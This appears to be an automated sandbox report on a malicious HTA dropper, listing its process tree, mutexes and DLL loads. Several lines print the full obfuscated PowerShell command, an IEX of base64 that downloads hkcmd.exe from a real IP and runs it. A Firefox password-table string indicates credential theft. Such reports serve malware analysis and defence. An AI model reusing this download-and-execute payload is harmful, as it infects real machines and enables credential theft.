                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_02D5534014_2_02D55340
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_02D5354014_2_02D53540
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_02D5353B14_2_02D5353B
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_02D4CB7014_2_02D4CB70
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_02D6B9A014_2_02D6B9A0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_02D4AED414_2_02D4AED4
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_02D4AEE014_2_02D4AEE0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_02D4AD9014_2_02D4AD90
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_02D4CD9014_2_02D4CD90
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_02D4AD8914_2_02D4AD89
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04D2E77314_2_04D2E773
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04D2E2B414_2_04D2E2B4
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04D2E3D314_2_04D2E3D3
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04D338FB14_2_04D338FB
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04D2D83814_2_04D2D838
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04D2CAF314_2_04D2CAF3
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 2C4CB970 appears 266 times
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 2C527E54 appears 88 times
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 2C54EA12 appears 80 times
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 2C55F290 appears 103 times
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 2C515130 appears 36 times
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 04E5B970 appears 266 times
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 04EB7E54 appears 88 times
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 04EDEA12 appears 84 times
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 04EEF290 appears 105 times
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 04EA5130 appears 36 times
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: String function: 02F44018 appears 45 times
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: String function: 02F3421C appears 66 times
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: String function: 02F3457C appears 804 times
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: String function: 02F43F9C appears 54 times
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: String function: 02F34414 appears 246 times
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winHTA@27/21@8/7
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F37B10 GetDiskFreeSpaceA,6_2_02F37B10
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F47B78 CreateToolhelp32Snapshot,6_2_02F47B78
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\hkcmd[1].exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7016:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2372:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxtvgikw.1nb.ps1Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: systeminfo.exe, 0000000E.00000003.1381999670.000000000314A000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 0000000E.00000003.1381999670.0000000003129000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 0000000E.00000003.1384698176.0000000003154000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 0000000E.00000002.2107718363.000000000314A000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 0000000E.00000002.2107718363.0000000003178000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: truelifewithmanmadethingsonherefor.htaVirustotal: Detection: 49%
                    Source: truelifewithmanmadethingsonherefor.htaReversingLabs: Detection: 30%
                    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\truelifewithmanmadethingsonherefor.hta"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESDFBA.tmp" "c:\Users\user\AppData\Local\Temp\4jbortuo\CSC8F941E4524844CFB0E06A557A70D099.TMP"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\hkcmd.exe "C:\Users\user\AppData\Roaming\hkcmd.exe"
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\\ProgramData\\1925.cmd
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\\ProgramData\\34695.cmd
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Windows\SysWOW64\systeminfo.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\hkcmd.exe "C:\Users\user\AppData\Roaming\hkcmd.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESDFBA.tmp" "c:\Users\user\AppData\Local\Temp\4jbortuo\CSC8F941E4524844CFB0E06A557A70D099.TMP"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\\ProgramData\\1925.cmdJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\\ProgramData\\34695.cmdJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
